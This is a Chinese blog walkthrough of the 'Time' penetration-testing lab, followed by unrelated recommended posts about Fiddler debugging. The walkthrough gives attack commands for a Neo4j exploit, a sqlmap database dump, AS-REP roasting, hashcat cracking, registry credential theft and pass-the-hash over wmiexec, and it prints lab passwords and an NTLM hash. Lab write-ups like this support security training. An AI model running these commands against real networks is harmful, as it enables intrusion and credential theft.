春秋云镜-Time

最新推荐文章于 2025-03-31 09:32:26 发布
最新推荐文章于 2025-03-31 09:32:26 发布
阅读量352 收藏 5
点赞数 6
分类专栏: 渗透靶场 文章标签: 网络安全 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80148821/article/details/143927809
版权

信息收集

没开放80端口,网站看不到

fscan扫描

![[]]

尝试端口,发现7474有界面

并且看到是Nei4j的

尝试cve-2021-34371

成功反弹shell
![[]]

flag1

连上直接抓就行

![[]]

然后上传fscan和毒液进行代理和扫描

tip:

这里只有上传到tmp目录下才能有权限执行

![[]]

然后代理到本机和kali上

flag2

根据扫描结果,可以看到那个后台登录

![[]]

直接抓包上sqlmap跑

python sqlmap.py -r 1.txt --dump

得到很多密码和flag2

![[]]

flag3,4

然后,用大佬的脚本提权用户名

import re

# 打开原始数据文件
with open('1.txt', 'r') as file:
    data = file.readlines()

# 提取指定字符串
users = []
for line in data:
    match = re.search(r'(\w+)@xiaorang.lab', line)
    if match:
        username = match.group(1)
        users.append(username)

# 保存提取后的字符串到 user.txt
with open('user.txt', 'w') as file:
    for user in users:
        file.write(user + '\n')

然后,用impacket工具包中的GetNPUsers.py进行密码破解

 proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

报错的话删除

sudo python3 -m pip uninstall pyOpenSSL

提取出

$krb5asrep$23$zhangxin@XIAORANG.LAB:e414f4692a6b1d0905e8ed118747ac6e$95ec406c7cdae081a496fe8009a23e684f0612d0632c903e1b34ce66275421c5d0f8125c8e651bf93ddee83bab492833c6af3316177096000e7e302359774ab66f05c254ad9c61ba9407756681e532c031f65961571469d15a08a069ea0ab26d38d876c2808055c0724c9b30dcc29ba9e62d56d8f697ea29d200f3c58bd107e8f39e16d34aa76dcb26d58e7d7e59a1d3160d249451a73fe6ba1a0d09d4a5210f2b6aeb09cf979a0ad51345244b21769878652f5c88223c4ed6648c650413bc31192e835cf74f274b20604a8e9ad3db6ec6e28f7b24452eaf7c456a7e4282e1bba9ffddc43915cfd1349c56a0

解hash

hashcat -m 18200 1.txt -a 0 ./rockyou.txt  --force

得到账号密码

windows远程连接

zhangxin@XIAORANG.LAB:strawberry

抓取密码

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

![[]]

登录另外一台机器

DefaultUserName    REG_SZ    yuxuan
DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
DefaultDomainName    REG_SZ    xiaorang.lab

用猕猴桃抓取hash

![[]]

然后直接kali中登录,抓取flag就行

proxychains impacket-wmiexec  XIAORANG/administrator@172.22.6.25   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9

type C:\Users\Administrator\flag\flag*

proxychains impacket-wmiexec  XIAORANG/administrator@172.22.6.12   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9

type C:\Users\Administrator\flag\flag*

![[]]

Fiddler抓包443
**My Coding Family**
10-03 1586
如上问题有的来自我自身项目开发,有的收集网站,有的来自读者…如有侵权,立马删除。再者,针对此专栏中部分问题及其问题的解答思路或步骤等,存在少部分搜集于全网社区及人工智能问答等渠道,若最后实在是没能帮助到你,还望见谅!并非所有的解答都能解决每个人的问题,在此希望屏幕前的你能够给予宝贵的理解,而不是立刻指责或者抱怨!如果你有更优解,那建议你出教程写方案,一同学习!共同进步。ok,以上就是我这期的Bug修复内容啦,如果还想查找更多解决方案,你可以看看我专门收集Bug及提供解决方案的专栏。
然后通过fiddler 定位前后端bug
MJ_user的博客
06-09 1万+
fiddler 是我们在测试中常用的抓包工具。那我们一般使用fiddler 工具来抓取请求信息来进行分析,一般有以下几种情况: 第一种情况:fiddler 在没有设置过过滤器的情况下面没有抓到请求信息,可能是前端页面元素没有绑定事件,也有可能是前端发生了JS 错误,这就是前端的bug 。 第二种情况:若抓取到的请求返回的结果错误,我们要确认一下,是否是前端传输的数据是错的,是的话就是前端的bug ,如果确定传值是正确的话,那就是后端的bug 。 第三种情况:若抓取到的请求返回值中间的http 的状态码是50
Fiddler如何定位bug是前后端的问题
weixin_52874247的博客
08-29 1641
看下面的接口有没有写要提示的字,如果写了,那就是前端的问题;如果没写,就是后端的问题。看Raw里面相应的文本信息,如果有信息,那就是前端的问题;如果没有,就是后端的问题。2、出现的问题:如果点击某个按钮会有提示,但是没显示这个提示。
如何使用fiddler抓取手机APP的包,进行前后端bug定位
最新发布
2501_91093988的博客
03-31 578
对于Windows用户,Fiddler和Sniff Master都是不错的选择。Sniff Master特别适合需要深度分析网络请求的开发人员,它能自动识别常见的数据格式,并提供更友好的交互界面。
fiddler抓包工具入门到入职之如何精准的定位前后端的bug
2301_77645573的博客
08-31 1171
在前面的回答中,我们介绍了如何使用Fiddler工具进行前后端Bug的定位,并且提到了可以使用Python代码来实现自动化测试和请求修改等功能。上述代码中的OnBeforeRequest和OnBeforeResponse方法分别处理HTTP请求和响应,并输出一些简单的信息,可以根据具体的需求进行修改。通过该代码可以监听请求和响应,并对其进行处理,以便进行前后端Bug的定位。综上所述,通过Fiddler和Python的结合,可以快速定位前后端的Bug,并实现自动化测试和请求修改等功能,以提高测试效率和质量。
定位bug
weixin_42494408的博客
10-23 1703
测试工程师不只是负责发现bug,除了发现bug这种基本功外,定位bug,提出解决方案,提出预防方案也是要掌握的技能。这里先说定位bug的要求,定位bug要更深入,前提当然是对功能、产品的流程、开发方案、开发人员非常熟悉了,以我们部门为例,定位bug至少要到下面这种程度。 首先确定是界面显示bug还是功能bug:        如果是界面bug:如贴图错误,文字错误,样式错误,则需要截图   ...
使用Fiddler定位前后端问题
qq_37515374的博客
01-07 3290
使用Fiddler定位前后端问题
使用Fiddler调试visual studion多个虚拟站点的问题分析
01-01
无法走本地代理,这个无法本地调试的问题并不是个BUG,微软官方是有给出过解释的,这是源于IE浏览器和.NET框架对于本地请求是不走代理的,因而Fiddler无法检测数据。于是为本地地址加.符号,这就带来URL行为不一致的...
fiddler4_4.6.2.0
08-17
在这个4.6.2.0版本中,开发者可能已经修复了一些已知的bug,提高了工具的稳定性和兼容性,使得用户能够更加流畅地使用。安装文件“fiddler4_4.6.2.0_setup.1453708442.exe”包含了完整的安装流程,确保用户能快速...
Fiddler中文手册
01-25
fiddler是最强大最好用的Web调试工具之一,Fiddler包含了一个强大的基于事件脚本的子系统,并且能使用.net语言进行扩展,适用于:开发环境的host配置;前后端接口调试;线上bugfix;性能分析和优化等等。
Fiddler如何定位Bug
03-25
1. 捕获请求与响应:首先在Fiddler中捕获你需要测试的请求与响应数据,这样可以方便地分析Bug出现的原因。 2. 过滤请求与响应:Fiddler可以根据各种规则来过滤请求与响应数据,方便你查找特定的问题,比如HTTP状态码...
fiddler抓包,怎么判断是前端问题还是后端问题
m0_65992358的博客
04-20 7061
可以通过后台返回的响应状态码来判断: 一般响应码以4xx开头,如400、403等是前端问题,可能是url地址填错了,或者请求参数有问题; 返回的响应码以5xx开头,如500、503,就是后台的问题。
如何判断BUG是属于前端还是后端(抓包/日志定位分析
weixin_44901808的博客
07-21 1万+
学会通过fiddler等工具抓包分析BUG、通过日志定位BUG
Fidder判断前后端的问题
仲浩的博客
09-20 8745
第一种情况: fiddler 在没有设置过过滤器的情况下面没有抓到请求信息,可能是前端页面元素没有绑定事件,也有可能是前端发生了JS 错误,这就是前端的bug 。 第二种情况: 若抓取到的请求返回的结果错误,我们要确认一下,是否是前端传输的数据是错的,是的话就是前端的bug ,如果确定传值是正确的话,那就是后端的bug 。 第三种情况: 若抓取到的请求返回值中间的http 的状态码是500的话,说明是后端服务器一般的内部错误,那这就是后端的bug 。 第四种情况: 若抓取到的请求返回值中间的http 的状态
发现抓包软件fiddlerbug
weixin_33686714的博客
08-22 920
2019独角兽企业重金招聘Python工程师标准>>> ...
如何利用charles迅速定位bug
软件测试前沿技术分享
07-19 7996
现在很多软件公司在开发一款app时,将后台与app前端的编码人员分离,这意味着增加了效率,但这也意味着作为测试的我们,不再停留在找到bug,并提交给开发修改的层面上了。我们需要掌握更多的技能来判断bug出在了前端开发还是后台开发上。 今天为大家简单的介绍一下如何利用charles抓包得到的信息来初步判断一下bug的原因来自前端还是后台。 先上图 以上是我在测试某app的某功能的...
Fiddler抓包的一些坑的解决办法
热门推荐
jfwqrzy的博客
07-30 6万+
  前言: 注意:以下大部分内容基本是第一篇文章的复制粘贴,我这里只是讲解一些坑如何解决。 本文章内容主要来源: https://blog.youkuaiyun.com/qq_32259579/article/details/78994326 Fiddler详细介绍: https://www.cnblogs.com/yyhh/p/5140852.html#l02     正文: 一共4个步骤...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

follycat

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值